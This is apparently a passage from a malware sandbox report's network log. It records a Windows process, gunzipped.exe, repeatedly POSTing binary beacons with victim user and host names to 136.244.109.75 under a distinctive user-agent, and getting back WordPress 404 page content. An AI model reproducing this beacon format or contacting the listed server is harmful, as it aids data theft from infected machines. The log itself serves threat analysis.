Apr 17, 2024 03:17:45.475322962 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:17:45.475341082 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:17:45.475358009 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:17:45.475378036 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:17:45.475394011 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:17:45.475410938 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:17:45.475428104 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:17:45.475444078 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:17:45.475462914 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	49748	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:17:45.817567110 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:17:46.020745039 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:17:46.936615944 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:17:45 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:17:46.936645985 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:17:46.936661959 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:17:46.936671972 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:17:46.936692953 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:17:46.936711073 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:17:46.936729908 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:17:46.936749935 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:17:46.936769009 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:17:46.936789989 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	49749	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:17:47.288202047 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:17:47.496434927 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:17:48.413928986 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:17:47 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:17:48.413994074 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:17:48.414031982 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:17:48.414069891 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:17:48.414107084 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
